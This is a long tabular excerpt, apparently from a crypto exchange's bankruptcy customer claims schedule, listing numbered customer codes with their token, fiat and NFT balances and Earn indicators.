| 07341336 | | BCH[.04576621], CUSDT[3], DOGE[1753.1479265], TRX[559.71682035], USD[0.00] | | |
| 07341337 | | BTC[0.07636359], ETH[0], SOL[1.64974032], USD[-27.63], USDT[0.00014034] | Yes | |
| 07341338 | | USD[10.00] | | |
| 07341339 | | BRZ[2], BTC[.00270445], DOGE[2806.47979971], USD[0.00] | | |
| 07341340 | | CUSDT[4], DOGE[1], TRX[1], USD[0.01] | | |
| 07341341 | | NFT (55950603661938485/Australia Ticket Stub #560)[1], USD[0.00] | Yes | |
| 07341342 | | USD[10.00] | | |
| 07341344 | | CUSDT[2], USD[0.00] | | |
| 07341345 | | USD[10.00] | | |
| 07341346 | | CUSDT[1], DOGE[2], USD[0.00] | | |
| 07341347 | | USD[10.00] | | |
| 07341348 | | USD[0.01], USDT[0] | | |
| 07341349 | | CUSDT[1], USD[10.85] | Yes | |
| 07341350 | | CUSDT[1], USD[50.95] | Yes | |
| 07341351 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341352 | | USD[10.00] | | |
| 07341353 | | DOGE[1.00004436], USD[0.01] | | |
| 07341354 | | BTC[0], DOGE[0], ETH[0], SHIB[0], SOL[0], USD[0.00] | | |
| 07341355 | | BCH[0], BTC[0], ETH[0], ETHW[0], SOL[0.00], USDT[0.00000001] | | |
| 07341357 | | USD[10.00] | | |
| 07341358 | | BAT[1], BTC[0], CUSDT[5], TRX[1], USD[100.01] | | |
| 07341359 | | USD[10.00] | | |
| 07341361 | | DOGE[166.38375881], USD[0.00] | | |
| 07341362 | | USD[0.00] | | |
| 07341363 | | USD[10.00] | | |
| 07341364 | | CUSDT[1], ETH[.01950313], ETHW[.01950313], USD[0.00] | | |
| 07341365 | | BTC[0], CUSDT[1], USD[0.00] | Yes | |
| 07341366 | | DOGE[9021.1517406], USD[10.00] | | |
| 07341367 | | USD[10.00] | | |
| 07341368 | | DOGE[1.81677794], USD[0.00], USDT[0] | Yes | |
| 07341369 | | BTC[.00034659], CUSDT[5], TRX[1], USD[0.00] | | |
| 07341370 | | BRZ[1], DOGE[11799.32146188], USD[0.45] | Yes | |
| 07341371 | | USD[10.00] | | |
| 07341372 | | CUSDT[4], DOGE[2953.94917448], ETH[.01995011], ETHW[.01995011], TRX[1], USD[0.00] | | |
| 07341373 | | ETH[.00075072], ETHW[.00075072], USD[0.84] | | |
| 07341375 | | DOGE[0], TRX[1], USD[0.00] | | |
| 07341376 | | USD[10.00] | | |
| 07341377 | | BAT[2], BRZ[1], CUSDT[13], DOGE[1], ETH[.13433047], ETHW[.13433047], MATIC[342.62711628], NFT (444999988506133238/Warriors 75th Anniversary Icon Edition Diamond #355)[1], NFT (450270496979759355/Warriors 75th Anniversary Icon Edition Diamond #3063)[1], NFT (469051450610237652/Astral Apes #93)[1], SHIB[6309571.79953173], SOL[7.22244149], TRX[4], USD[0.00], USDT[0] | | |
| 07341378 | | USD[10.00] | | |
| 07341379 | | BTC[0], CUSDT[3], DOGE[0], ETH[0], GRT[0], SHIB[1], TRX[1.00035270], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07341380 | | USD[0.00] | | |
| 07341381 | | USD[10.00] | | |
| 07341382 | | TRX[233.78457415], USD[0.00] | Yes | |
| 07341383 | | USD[10.00] | | |
| 07341384 | | USD[10.00] | | |
| 07341385 | | USD[10.00] | | |
| 07341387 | | USD[10.00] | | |
| 07341388 | | DOGE[0], TRX[70.81487981], USD[0.00] | | |
| 07341390 | | BTC[.00021214], USD[0.00] | | |
| 07341391 | | BRZ[5], CUSDT[5], TRX[3], USD[0.01] | | |
| 07341392 | | USD[10.00] | | |
| 07341393 | | BRZ[1], CUSDT[18], DOGE[32.70360954], SHIB[12], TRX[10.01102039], USD[0.00] | Yes | |
| 07341394 | | USD[10.00] | | |
| 07341395 | | BAT[0], BCH[0], CUSDT[3], DOGE[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07341396 | | USD[10.00] | | |
| 07341398 | | USD[10.00] | | |
| 07341399 | | DOGE[.29445241], GRT[.22378], USD[0.00] | | |
| 07341400 | | USD[10.00] | | |
| 07341402 | | BTC[0], NFT (288854633238811432/Coachella x FTX Weekend 2 #14884)[1], USD[0.01] | Yes | |
| 07341404 | | USD[10.00] | | |
| 07341405 | | USD[10.00] | | |
| 07341406 | | CUSDT[2], TRX[.00000001], USD[65.48], USDT[0.00003990] | | |
| 07341407 | | BRZ[1], CUSDT[2], DOGE[1], LINK[78.63703217], SUSHI[662.09084017], TRX[1], USD[0.00], USDT[1.10281941] | Yes | |
| 07341408 | | USD[10.00] | | |
| 07341409 | | SHIB[2], USD[19.32] | Yes | |
| 07341410 | | USD[10.00] | | |
| 07341411 | | USD[20.00] | | |
| 07341412 | | USD[0.00], USDT[9.9470557] | | |
| 07341413 | | CUSDT[1], TRX[120.22284511], USD[0.00] | Yes | |
| 07341414 | | USD[0.01] | | |
| 07341417 | | BAT[3.05549401], BRZ[1], BTC[0.00000833], CUSDT[2], DOGE[12.03424044], GRT[4.06666685], MATIC[1.00164518], SHIB[7], SUSHI[1.030448], TRX[10], USD[0.00], USDT[0.08800422] | Yes | |
| 07341418 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341419 | | DOGE[1], USD[0.01] | | |
| 07341420 | | LINK[0], USD[0.00] | | |
| 07341421 | | BRZ[0], BTC[0], DOGE[1], ETH[0], GRT[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07341422 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07341423 | | TRX[.25], USD[380.41], USDT[0] | Yes | |
| 07341424 | | CUSDT[1], USD[0.00] | | |
| 07341425 | | USD[10.00] | | |
| 07341426 | | CUSDT[1], DOGE[.00007407], SOL[2.54706305], TRX[2], USD[0.00] | | |
| 07341427 | | USD[10.00] | | |
| 07341428 | | CUSDT[2], USD[0.00] | Yes | |
| 07341429 | | USD[10.00] | | |
| 07341430 | | USD[10.00] | | |
| 07341431 | | CUSDT[2], DOGE[5168.85425372], USD[0.00] | | |
| 07341432 | | USD[10.00] | | |
| 07341433 | | USD[10.00] | | |
| 07341434 | | USD[0.03] | | |
| 07341435 | | USD[10.00] | | |
| 07341436 | | CUSDT[3], DOGE[.00069005], TRX[1], USD[0.00] | | |
| 07341437 | | USD[0.00] | | |
| 07341438 | | BTC[.00000011], USD[0.00], USDT[0.00000001] | | |
| 07341439 | | DOGE[3162.3], ETH[.04995], ETHW[.04995], SOL[3.3946], USD[0.00] | | |
| 07341440 | | USD[10.00] | | |
| 07341441 | | DOGE[.00345312], GRT[3.83778895], USD[0.00] | | |
| 07341442 | | USD[10.00] | | |
| 07341443 | | BRZ[2], CUSDT[10], USD[0.00] | Yes | |
| 07341444 | | BTC[.00007822], GRT[.4208], SOL[7.5344], USD[0.92], USDT[0.00001435], YFI[.0008632] | | |
| 07341445 | | DOGE[5961.79422507], USD[0.02] | Yes | |
| 07341446 | | USD[10.00] | | |
| 07341447 | | USD[10.00] | | |
| 07341448 | | BAT[1], BRZ[2], BTC[.00229698], CUSDT[9], DOGE[1], USD[0.00], USDT[1] | | |
| 07341449 | | USD[10.00] | | |
| 07341450 | | DOGE[2991.79947491], USD[0.00] | Yes | |
| 07341451 | | BTC[.00005808], LINK[.04199008], SOL[.24289411], UNI[.05532028], USD[14.00], YFI[.00003119] | | |
| 07341454 | | USD[10.00] | | |
| 07341455 | | BRZ[1], DOGE[2], SUSHI[0], TRX[1], USD[0.00] | | |
| 07341456 | | CUSDT[1], ETH[.01773977], ETHW[.01752089], SHIB[1], USD[0.00] | Yes | |
| 07341457 | | BRZ[1], CUSDT[1], DOGE[1], TRX[3], USD[0.01] | | |
| 07341458 | | DOGE[20.23671983], USD[0.00] | | |
| 07341459 | | BRZ[1], BTC[0], DOGE[1], ETH[0.00000940], ETHW[0.00000940], GRT[1], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07341460 | | USD[10.00] | | |
| 07341461 | | BTC[.00066777], CUSDT[2], DOGE[444.68536738], ETH[.00589393], ETHW[.00582553], SHIB[312861.51476181], USD[0.00] | Yes | |
| 07341462 | | USD[10.00] | | |
| 07341463 | | CUSDT[2], TRX[1], USD[17.36] | | |
| 07341464 | | USD[10.00] | | |
| 07341465 | | BTC[.00000535], USD[0.00] | Yes | |
| 07341466 | | USD[10.00] | | |
| 07341467 | | CUSDT[2], DOGE[239.69426051], ETH[.00285704], ETHW[.00285704], USD[12.17] | | |
| 07341468 | | USD[10.00] | | |
| 07341469 | | DOGE[178.11976773], USD[0.00] | | |
| 07341470 | | USD[10.00] | | |
| 07341472 | | USD[10.00] | | |
| 07341473 | | USD[10.00] | | |
| 07341474 | | DOGE[3178.27051283], USD[-109.99] | | |
| 07341475 | | USD[10.00] | | |
| 07341476 | | USD[10.00] | | |
| 07341477 | | CUSDT[1], DOGE[544.43972976], USD[0.00] | | |
| 07341478 | | BRZ[0], DOGE[6.23885473], TRX[1], USD[0.03] | | |
| 07341479 | | CUSDT[1], DOGE[10.13466419], GBP[0.05], LTC[.0091518], SOL[.00387047], USD[45.26], USDT[0.00288812] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341480 | | DOGE[0], ETH[0], MATIC[0], TRX[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07341481 | | DOGE[0], USD[0.00] | Yes | |
| 07341482 | | USD[10.00] | | |
| 07341483 | | DOGE[144.03618188], TRX[1], USD[0.00] | | |
| 07341484 | | BAT[4], BRZ[2], CUSDT[7], DOGE[11], GRT[1], SHIB[4528708.59647436], SOL[10.24089757], SUSHI[1], TRX[2], USD[0.78], USDT[0] | | |
| 07341485 | | CUSDT[2], USD[0.01] | | |
| 07341486 | | USD[10.00] | | |
| 07341487 | | BAT[1], CUSDT[6], DOGE[29.60464755], LINK[.99225022], SOL[1.00919371], TRX[6], USD[266.80] | | |
| 07341488 | | USD[10.00] | | |
| 07341489 | | CUSDT[1], PAXG[0], TRX[1], USD[26.03] | Yes | |
| 07341490 | | CUSDT[1], USD[0.01] | | |
| 07341491 | | BAT[0], DOGE[0], ETH[0], LTC[0], SHIB[2], SUSHI[0], USD[0.01] | Yes | |
| 07341492 | | DOGE[123.52240949], USD[0.00] | | |
| 07341493 | | USD[10.00] | | |
| 07341494 | | BRZ[0], BTC[0], DOGE[0.71815481], USD[0.00] | | |
| 07341496 | | USD[0.00] | | |
| 07341497 | | BRZ[1], CUSDT[4], DOGE[174.75074991], TRX[88.21369498], USD[0.49] | Yes | |
| 07341498 | | DOGE[12.50917822], TRX[1], USD[0.08] | | |
| 07341499 | | DOGE[5885.09573989], TRX[2], USD[0.00] | | |
| 07341500 | | DOGE[138.91175144], USD[0.00] | | |
| 07341501 | | USD[10.00] | | |
| 07341502 | | USD[10.00] | | |
| 07341504 | | USD[0.00] | | |
| 07341505 | | USD[0.00] | | |
| 07341506 | | BTC[0], DOGE[0], ETH[0], USD[0.45], USDT[0.00000740] | | |
| 07341507 | | BAT[28.82310183], USD[0.00] | Yes | |
| 07341508 | | USD[10.00] | | |
| 07341509 | | USD[10.00] | | |
| 07341511 | | ETH[.0037286], ETHW[.0037286], USD[0.00] | | |
| 07341512 | | USD[10.00] | | |
| 07341513 | | BF_POINT[600], DOGE[0], ETH[0.00000108], ETHW[0.00000108], LINK[0.00032656], SHIB[2], SOL[0], TRX[0], USD[29154.73], USDT[0] | Yes | |
| 07341514 | | BAT[1], CUSDT[3], DOGE[522.43982778], LTC[2.70139546], SHIB[1], TRX[4], USD[0.00] | | |
| 07341516 | | DOGE[151.48761769], USD[0.00] | Yes | |
| 07341517 | | CUSDT[1], DOGE[4], USD[0.01] | | |
| 07341518 | | DOGE[0], LTC[0], SHIB[1], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07341519 | | CUSDT[2], DOGE[4625.46495851], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07341520 | | DOGE[.75], LINK[31397768], SOL[121.49604299], TRX[3], USD[0.00], USDT[1.09351657] | | |
| 07341522 | | BCH[.05339148], BTC[.00468933], CUSDT[1053.81460926], DOGE[858.2636926], ETH[.01184553], ETHW[.01169505], PAXG[.01725463], SOL[1.39128349], TRX[353.06755841], USD[163.60] | Yes | |
| 07341523 | | USD[10.00] | | |
| 07341525 | | CUSDT[2], DOGE[1], USD[0.01] | | |
| 07341526 | | USD[10.00] | | |
| 07341527 | | DOGE[.5781882], GRT[1], USD[0.00] | | |
| 07341528 | | USD[10.00] | | |
| 07341529 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07341531 | Contingent, Disputed | USD[5.56] | | |
| 07341532 | | USD[10.00] | | |
| 07341533 | | BTC[0.00000477], CUSDT[1], DOGE[11.074274], ETH[.00000008], ETHW[.00000008], LTC[.09241398], USD[0.00], USDT[0.00000001] | Yes | |
| 07341534 | | SOL[.98337644], USD[12.91] | | |
| 07341535 | | USD[11.08] | Yes | |
| 07341536 | | BAT[1], BRZ[5], CUSDT[14], DOGE[2], SUSHI[0], TRX[2], USD[0.00] | | |
| 07341537 | | CUSDT[1], USD[0.00] | | |
| 07341538 | | BRZ[1], DOGE[.5690983], TRX[3], USD[0.00] | | |
| 07341539 | | USD[10.00] | | |
| 07341540 | | BRZ[0], CUSDT[1], TRX[0], USD[0.00], USDT[1.10475669] | Yes | |
| 07341542 | | BRZ[1], CUSDT[3], DOGE[0], ETH[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.88] | | |
| 07341543 | | USD[10.00] | | |
| 07341544 | | ALGO[0], BCH[0], BTC[0], DOGE[1], ETH[0], LTC[0], MATIC[0], PAXG[0], SHIB[3], USD[0.00] | Yes | |
| 07341545 | | CUSDT[1], DOGE[1201.78458022], ETH[.08714615], ETHW[.08612193], USD[0.25] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341546 | | CUSDT[1], DOGE[.00003081], USD[415.31], USDT[1] | | |
| 07341547 | | USD[10.00] | | |
| 07341549 | | USD[10.00] | | |
| 07341550 | | USD[10.00] | | |
| 07341551 | | USD[10.00] | | |
| 07341552 | | USD[10.00] | | |
| 07341553 | | USD[10.00] | | |
| 07341554 | | USD[10.00] | | |
| 07341555 | | USD[10.00] | | |
| 07341556 | | DOGE[1], USD[0.00] | | |
| 07341557 | | BRZ[1], DOGE[1.02349634], NFT (493749359514953838/FTX - Off The Grid Miami #2761)[1], UNI[.39477446], USD[0.00] | Yes | |
| 07341558 | | ALGO[96.903], CUSDT[12], LINK[902.5965], MATIC[1078.92], SHIB[2], TRX[3157.93329829], USD[2067.93] | Yes | |
| 07341559 | | BAT[1], BCH[0], BRZ[0], BTC[0], DOGE[4676.55068163], ETH[0], GRT[889.78950894], LINK[47.88909533], MATIC[354.20482711], SHIB[43140079.62118639], TRX[5261.80538531], USD[520.97], USDT[0] | Yes | |
| 07341560 | | TRX[1], USD[0.01] | | |
| 07341561 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07341562 | | BAT[1], CUSDT[2], DOGE[1], GRT[1], TRX[2], USD[0.01] | | |
| 07341563 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07341564 | | BAT[2], CUSDT[2], DOGE[.00006172], TRX[1], USD[0.01] | | |
| 07341565 | | USD[10.00] | | |
| 07341566 | | CUSDT[.00004795], SOL[0.08444129], USD[0.00] | Yes | |
| 07341567 | | USD[10.00] | | |
| 07341568 | | BTC[.00020516], USD[0.00] | Yes | |
| 07341569 | | USD[10.00] | | |
| 07341570 | | BAT[2.08373238], BRZ[3], CUSDT[4], DOGE[7851.50741116], GRT[1.00278927], TRX[4], USD[0.00], USDT[1.0849797] | Yes | |
| 07341571 | | USD[10.00] | | |
| 07341572 | | DOGE[2], GRT[592.29661658], SUSHI[0], TRX[1], UNI[0], USD[0.00] | Yes | |
| 07341573 | | USD[10.00] | | |
| 07341574 | | USD[10.66] | Yes | |
| 07341575 | | USD[10.00] | | |
| 07341576 | | BTC[.00006983], CUSDT[1], DOGE[95.00295315], ETH[.00041518], ETHW[.00041518], USD[0.00] | | |
| 07341577 | | USD[10.00] | | |
| 07341578 | | USD[10.00] | | |
| 07341579 | | USD[0.00] | | |
| 07341580 | | USD[10.00] | | |
| 07341581 | | USD[10.00] | | |
| 07341582 | | USD[10.00] | | |
| 07341583 | | USD[10.00] | | |
| 07341585 | | USD[10.00] | | |
| 07341586 | | CUSDT[2], USD[571.38] | | |
| 07341587 | | USD[0.00] | Yes | |
| 07341588 | | BCH[0.01391138], DOGE[1], USD[0.00] | | |
| 07341589 | | DOGE[1], USD[0.00] | | |
| 07341590 | | USDT[0] | | |
| 07341591 | | BRZ[0], BTC[0.00000003], USD[0.45] | Yes | |
| 07341592 | | USD[10.00] | | |
| 07341593 | | USD[10.00] | | |
| 07341594 | | USD[10.00] | | |
| 07341595 | | USD[0.00] | Yes | |
| 07341596 | | TRX[91.42036341], USD[0.00] | | |
| 07341597 | | DOGE[.49750576], SHIB[38146.43836491], USD[0.00], USDT[0] | | |
| 07341598 | | BTC[0], CUSDT[1], DOGE[62.21799082], USD[0.00] | | |
| 07341599 | | USD[10.00] | | |
| 07341600 | | USD[10.00] | | |
| 07341601 | | USD[10.00] | | |
| 07341603 | | USD[10.00] | | |
| 07341604 | | USD[10.00] | | |
| 07341605 | | USD[10.00] | | |
| 07341606 | | CUSDT[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341607 | | BAT[0], DOGE[0], GRT[0], USD[0.00] | | |
| 07341608 | | DOGE[1], USD[22.49] | | |
| 07341609 | | USD[10.00] | | |
| 07341610 | | USD[10.00] | | |
| 07341611 | | USD[10.00] | | |
| 07341612 | | USD[10.00] | | |
| 07341613 | | SHIB[2842.91664457], USD[0.00] | Yes | |
| 07341614 | | DOGE[1], USD[0.01] | | |
| 07341615 | | USD[10.00] | | |
| 07341617 | | USD[10.00] | | |
| 07341618 | | USD[10.00] | | |
| 07341619 | | USD[10.00] | | |
| 07341620 | | CUSDT[3], DOGE[.0000234], TRX[2], USD[0.00] | Yes | |
| 07341621 | | ETH[.00257135], ETHW[.00257135], USD[0.00] | | |
| 07341622 | | USD[10.00] | | |
| 07341623 | | USD[10.00] | | |
| 07341624 | | DOGE[1], USD[0.00] | | |
| 07341625 | | CUSDT[3], DOGE[30.47652058], TRX[.00000013], USD[0.00] | | |
| 07341626 | | USD[10.00] | | |
| 07341627 | | TRX[0], USD[0.01] | | |
| 07341628 | | BTC[.00000037], CUSDT[21], DAI[.04539596], ETHW[.12372215], NFT [549346813494426934/Space Burns #6295][1], USD[0.00] | Yes | |
| 07341629 | | BTC[.00021164], USD[0.00] | | |
| 07341630 | | BTC[0.00002714], LINK[.0471], USD[0.00], USDT[.22419828] | | |
| 07341631 | | BTC[.00546391], CUSDT[4], DOGE[2], ETH[.09000867], ETHW[.08896253], LINK[5.78752654], USD[0.00] | Yes | |
| 07341632 | | USD[10.00] | | |
| 07341633 | | USD[10.00] | | |
| 07341634 | | USD[10.00] | | |
| 07341635 | | BAT[1], CUSDT[2], USD[0.01] | | |
| 07341636 | | USD[10.00] | | |
| 07341637 | | AVAX[.00001456], BRZ[4], BTC[0.00000007], CUSDT[11], GRT[.00253994], NFT [372250025449257544/FTX - Off The Grid Miami #2259][1], NFT [443259232868032429/Australia Ticket Stub #1712][1], NFT [575575561458447195/Entrance Voucher #2689][1], SHIB[15], SOL[0], SUSHI[.00025765], TRX[6], USD[0.01] | Yes | |
| 07341638 | | BRZ[1], CUSDT[5], DOGE[4], GRT[1], MATIC[249.69531905], SHIB[1], SUSHI[.6076306], TRX[2], USD[0.01], USDT[0] | | |
| 07341639 | | BRZ[11], CUSDT[11], GRT[1], TRX[2], USD[2.24] | | |
| 07341640 | | USD[10.00] | | |
| 07341641 | | USD[0.87] | | |
| 07341642 | | USD[10.00] | | |
| 07341643 | | CUSDT[3], DOGE[1], TRX[5], USD[0.00], USDT[1] | | |
| 07341644 | | USD[10.00] | | |
| 07341645 | | USD[10.00] | | |
| 07341646 | | USD[10.00] | | |
| 07341647 | | USD[10.00] | | |
| 07341648 | | USD[10.00] | | |
| 07341649 | | DOGE[199.77723054], USD[0.00] | Yes | |
| 07341650 | | DOGE[1611.72614756], TRX[207.16878579], USD[30.00] | | |
| 07341651 | | BAT[.00064981], BRZ[1], CUSDT[5], DOGE[1.90727328], ETH[0], TRX[2], USD[0.00] | | |
| 07341652 | | BTC[0], ETH[0.00000183], ETHW[0.00000182], LTC[0], MATIC[0], SHIB[15], SOL[0.00000001], USD[0.00], USDT[0] | Yes | |
| 07341653 | | CUSDT[1], DOGE[13.1962889], USD[0.01] | | |
| 07341654 | | DOGE[1], USD[0.00] | | |
| 07341655 | | USD[10.00] | | |
| 07341656 | | CUSDT[9085.22564513], TRX[681.70555356], USD[0.00] | Yes | |
| 07341657 | | LTC[.05052147], USD[0.00] | | |
| 07341658 | | USD[10.00] | | |
| 07341659 | | BAT[1.0165555], CUSDT[4], DOGE[4862.57545965], TRX[1], USD[0.00] | Yes | |
| 07341660 | | BRZ[2], CUSDT[2], ETH[.00000001], ETHW[0], TRX[1], USD[0.00], USDT[1.08639744] | Yes | |
| 07341661 | | DOGE[0], USD[0.00] | | |
| 07341662 | | USD[0.05] | | |
| 07341663 | | USD[10.00] | | |
| 07341664 | | USD[10.00] | | |
| 07341665 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341666 | | USD[10.00] | | |
| 07341667 | | USD[10.75] | Yes | |
| 07341668 | | BTC[0], ETH[0], ETHW[0], SOL[0], SUSHI[3.486], USD[0.00] | | |
| 07341669 | | USD[10.00] | | |
| 07341670 | | DOGE[0], MATIC[0], NFT (303230667517623103/Entrance Voucher #4108)[1], SHIB[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07341671 | | USD[10.00] | | |
| 07341672 | | USD[10.00] | | |
| 07341673 | | USD[10.00] | | |
| 07341674 | | USD[10.00] | | |
| 07341675 | | USD[10.00] | | |
| 07341676 | | USD[0.00] | | |
| 07341677 | | CUSDT[1], USD[0.00] | | |
| 07341678 | | USD[10.00] | | |
| 07341679 | | USD[10.00] | | |
| 07341680 | | USD[10.00] | | |
| 07341681 | | BCH[.11968677], BRZ[2], BTC[.00203056], CUSDT[5], DOGE[2.00857231], ETH[.08789019], ETHW[.08789019], GRT[1], LINK[2.96071868], SUSHI[27.60051856], TRX[2157.06451051], UNI[9.73780937], USD[0.09] | | |
| 07341682 | | USD[10.00] | | |
| 07341683 | | BRZ[1], CUSDT[10], DOGE[5.01477061], GRT[2.08476023], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07341684 | | USD[10.00] | | |
| 07341685 | | USD[10.00] | | |
| 07341686 | | BRZ[1], DOGE[1926.88404163], LTC[0], SHIB[1], TRX[1], USD[0.00], USDT[1] | | |
| 07341687 | | BAT[1], BRZ[2], TRX[1], USD[0.02] | | |
| 07341688 | | BRZ[2], CUSDT[7], DOGE[0], ETH[0], GRT[1.00498957], SOL[.00002135], TRX[7], UNI[.00000499], USD[0.00] | Yes | |
| 07341689 | | DOGE[146.17891246], USD[0.00] | | |
| 07341690 | | USD[0.00] | | |
| 07341691 | | BRZ[0], BTC[0], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07341692 | | TRX[5], USD[0.01] | | |
| 07341693 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07341694 | | USD[10.00] | | |
| 07341695 | | USD[10.00] | | |
| 07341696 | | BTC[.00006404], ETH[.00064363], ETHW[.00064363], SOL[21.6092], SUSHI[254.478], USD[3.96] | | |
| 07341697 | | USD[10.00] | | |
| 07341698 | | USD[10.00] | | |
| 07341699 | | USD[10.00] | | |
| 07341700 | | USD[10.00] | | |
| 07341701 | | USD[10.00] | | |
| 07341702 | | USD[0.00] | | |
| 07341703 | | BTC[.00000001], SHIB[3], USD[14.04] | Yes | |
| 07341704 | | USD[10.00] | | |
| 07341705 | | ETH[.00229916], ETHW[.00227178], SHIB[111286.47973482], USD[0.00] | Yes | |
| 07341706 | | USD[10.00] | | |
| 07341707 | | BRZ[2], CUSDT[4], TRX[5], USD[0.01] | | |
| 07341708 | | BRZ[1], CUSDT[3], DOGE[.00001981], TRX[1], USD[0.00] | Yes | |
| 07341710 | | BRZ[0], CUSDT[1], TRX[1], USD[0.00], USDT[0] | | |
| 07341711 | | USD[10.00] | | |
| 07341713 | | USD[0.00] | Yes | |
| 07341714 | | SHIB[141027.83231249], USD[0.00] | | |
| 07341715 | | USD[10.00] | | |
| 07341716 | | CUSDT[2], DOGE[3], TRX[1], USD[0.01] | | |
| 07341717 | | CUSDT[2], DOGE[1], UNI[.00035821], USD[0.00], YFI[.0289386] | Yes | |
| 07341719 | | BRZ[1], CUSDT[4], DOGE[7.3724836], GRT[1.00498957], TRX[4], USD[0.00] | Yes | |
| 07341720 | | CUSDT[1], USD[0.01] | | |
| 07341721 | | DOGE[2], TRX[5270.90166739], USD[0.00], USDT[0.00000001] | | |
| 07341722 | | USD[10.00] | | |
| 07341723 | | USD[10.00] | | |
| 07341724 | | USD[10.00] | | |
| 07341725 | | CUSDT[1], USD[0.64] | Yes | |
| 07341727 | | BAT[0], BRZ[0], GRT[0], LINK[0], SOL[0], TRX[0], USD[0.00], USDT[0.00000025] | | |
| 07341728 | | BRZ[1], BTC[0], CUSDT[2], ETH[0.00407182], ETHW[0.00401706], GRT[15.27523901], LINK[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07341729 | | CUSDT[4], TRX[1], USD[0.00] | | |
| 07341730 | | CUSDT[2], DOGE[3], GRT[.00105353], MATIC[0], SOL[3.37275983], TRX[1], USD[0.01] | Yes | |
| 07341731 | | USD[10.00] | | |
| 07341732 | | CUSDT[2], DOGE[86.28065653], TRX[156.86672975], USD[0.01] | Yes | |
| 07341733 | | PAXG[.00107237], SOL[.22460481], SUSHI[.29259607], USD[0.00] | | |
| 07341734 | | USD[10.00] | | |
| 07341736 | | USD[10.00] | | |
| 07341737 | | ETH[.00367634], ETHW[.0036353], USD[0.00] | Yes | |
| 07341738 | | DOGE[0], USD[0.00] | | |
| 07341739 | | BRZ[0], GRT[0], TRX[0], USD[0.00] | | |
| 07341740 | | USD[0.00] | | |
| 07341741 | | USD[0.00] | | |
| 07341742 | | BAT[1.992], BTC[0.00000041], DAI[5.5], DOGE[.41937573], ETH[.000568], ETHW[.000568], LTC[.00736], SGD[0.69], SHIB[36900000], USD[0.02], USDT[0] | | |
| 07341743 | | USD[10.00] | | |
| 07341744 | | CUSDT[2], DOGE[.00003663], USD[10.00] | | |
| 07341745 | | TRX[0], USD[0.01] | | |
| 07341746 | | SHIB[1], USD[40.21] | Yes | |
| 07341747 | | CUSDT[1], DOGE[4087.69537349], GRT[.39726581], TRX[.43422745], USD[0.40] | Yes | |
| 07341748 | | TRX[1], USD[0.00] | | |
| 07341749 | | USD[0.00] | | |
| 07341750 | | BRZ[1], CUSDT[2], SHIB[1], TRX[1.99774322], USD[0.00] | Yes | |
| 07341751 | | USD[10.00] | | |
| 07341752 | | BRZ[0], LINK[0], USD[0.01], USDT[0] | | |
| 07341753 | | DOGE[1.13314397], USD[0.01] | | |
| 07341754 | | CUSDT[3], DOGE[.00091795], USD[0.01], USDT[0] | Yes | |
| 07341755 | | CUSDT[1], DOGE[.00003957], USD[0.00] | | |
| 07341756 | | BRZ[1], TRX[1], USD[0.00], USDT[0] | | |
| 07341757 | | USD[10.00] | | |
| 07341758 | | USD[10.00] | | |
| 07341759 | | USD[10.00] | | |
| 07341761 | | USD[10.00] | | |
| 07341762 | | BRZ[0.00000738], BTC[.00000058], DOGE[1], ETH[0], LTC[0], USD[0.00], USDT[0.00000001] | | |
| 07341763 | | BRZ[2], CUSDT[3], DOGE[2.00003564], TRX[.00004599], USD[0.00] | | |
| 07341764 | | DOGE[.00002822], TRX[2], USD[99.88] | | |
| 07341765 | | USD[0.00] | | |
| 07341766 | | USD[10.00] | | |
| 07341767 | | DOGE[384.20601937], USD[0.00] | | |
| 07341768 | | CUSDT[4], USD[0.01], USDT[0.00000001] | | |
| 07341769 | | BTC[.00029679], CUSDT[2], DOGE[886.09337977], TRX[4], USD[0.00] | Yes | |
| 07341770 | | DOGE[815.6812339], TRX[1], USD[0.00] | | |
| 07341772 | | DOGE[2], USD[0.00] | | |
| 07341773 | | DOGE[671.65140984], SHIB[40577.37218468], USD[0.00] | Yes | |
| 07341774 | | USD[0.00] | | |
| 07341775 | | USD[10.00] | | |
| 07341776 | | USD[10.00] | | |
| 07341777 | | USD[10.00] | | |
